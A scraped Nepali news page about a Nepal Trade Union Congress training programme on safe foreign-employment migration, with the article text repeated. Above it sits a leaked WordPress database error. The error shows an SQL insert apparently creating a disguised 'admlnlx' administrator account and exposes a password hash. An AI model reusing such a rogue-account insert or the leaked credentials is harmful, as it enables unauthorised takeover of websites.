WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BB55jtcvDZRpyB5fTZb66TaPPredot0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 02:28:18', '', 'admlnlx', 'admlnlx')
काठमाडौँ,मंसिर २२ –
नेपाल ट्रेड युनियन काँग्रेसले ‘सुरक्षित आप्रवास’ का विषयमा दुई दिने क्षमता अभिवृद्धि कार्यक्रम आयोजना गरेको छ ।
आज यहाँ सुरु भएको कार्यक्रममा ट्रेड युनियन काँग्रेसका अध्यक्ष खिलानाथ दाहालले वैदेशिक रोजगारीको क्षेत्रमा देखापरेका विकृति अन्त्य र आगामी कार्ययोजना बनाउन कार्यक्रमको आयोजना गरिएको बताउनुभयो ।
“सम्बन्धित देशसँग श्रम सम्भौता गरेर मात्रै सो देशमा वैदेशिक रोजगारीका लागि खुला गरिनुपर्छ,” उहाँले भन्नुभयो । सो सङ्गठनका आप्रवास विभाग प्रमुख सञ्जय मिश्रले कार्यक्रमका सहभागीलाई कार्यक्षेत्रमा फर्किएपछि आआफ्नो ठाउँबाट वैदेशक रोजगारीलाई सुरक्षित, मर्यादित र व्यवस्थित बनाउन भूमिका खेल्न आग्रह गर्नुभयो । रासस नेपाल ट्रेड युनियन काँग्रेसले ‘सुरक्षित आप्रवास’ का विषयमा दुई दिने क्षमता अभिवृद्धि कार्यक्रम आयोजना गरेको छ ।
आज यहाँ सुरु भएको कार्यक्रममा ट्रेड युनियन काँग्रेसका अध्यक्ष खिलानाथ दाहालले वैदेशिक रोजगारीको क्षेत्रमा देखापरेका विकृति अन्त्य र आगामी कार्ययोजना बनाउन कार्यक्रमको आयोजना गरिएको बताउनुभयो ।
“सम्बन्धित देशसँग श्रम सम्भौता गरेर मात्रै सो देशमा वैदेशिक रोजगारीका लागि खुला गरिनुपर्छ,” उहाँले भन्नुभयो । सो सङ्गठनका आप्रवास विभाग प्रमुख सञ्जय मिश्रले कार्यक्रमका सहभागीलाई कार्यक्षेत्रमा फर्किएपछि आआफ्नो ठाउँबाट वैदेशक रोजगारीलाई सुरक्षित, मर्यादित र व्यवस्थित बनाउन भूमिका खेल्न आग्रह गर्नुभयो । – रासस